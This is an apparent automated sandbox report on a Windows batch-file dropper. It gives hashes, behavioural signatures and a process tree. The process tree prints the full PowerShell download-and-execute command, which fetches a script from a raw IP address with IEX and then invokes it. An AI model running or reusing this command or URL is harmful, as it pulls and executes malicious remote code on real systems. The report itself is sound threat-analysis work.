Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
04-08-2020 12:31
Static task
static1
Behavioral task
behavioral1
Sample
e241deaf6f1e1d0d13589a66c942bc3b.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
e241deaf6f1e1d0d13589a66c942bc3b.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
e241deaf6f1e1d0d13589a66c942bc3b.bat
-
Size
216B
-
MD5
c79f7f4fe4b00e41b6dce691ba63a8ae
-
SHA1
b8f15e882ed45e2278545ad4e686e16cb1787dc3
-
SHA256
2805f33e7f7992595a10507ddb57e5bcb3ed34d8b6e8dcfa984ef77c31037132
-
SHA512
b20d2b133be14683663d795b6c2abf5fb2b23a2b87cc9ddbba1218dbd5d9704d112d13d51e6cb62f18297c8797d2c3152501bc35f1f97af2821c19d201a40034
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/e241deaf6f1e1d0d13589a66c942bc3b
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2884 wrote to memory of 3688 2884 cmd.exe powershell.exe PID 2884 wrote to memory of 3688 2884 cmd.exe powershell.exe PID 2884 wrote to memory of 3688 2884 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 724 3688 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 724 WerFault.exe Token: SeBackupPrivilege 724 WerFault.exe Token: SeDebugPrivilege 724 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe 724 WerFault.exe -
ServiceHost packer 6 IoCs
Detects ServiceHost packer used for .NET malware
Processes:
resource yara_rule behavioral2/memory/3688-2-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3688-3-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3688-4-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3688-5-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3688-6-0x0000000000000000-mapping.dmp servicehost behavioral2/memory/3688-7-0x0000000000000000-mapping.dmp servicehost
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e241deaf6f1e1d0d13589a66c942bc3b.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/e241deaf6f1e1d0d13589a66c942bc3b');Invoke-KXXKRQWJL;Start-Sleep -s 10000"2⤵PID:3688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3688 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:724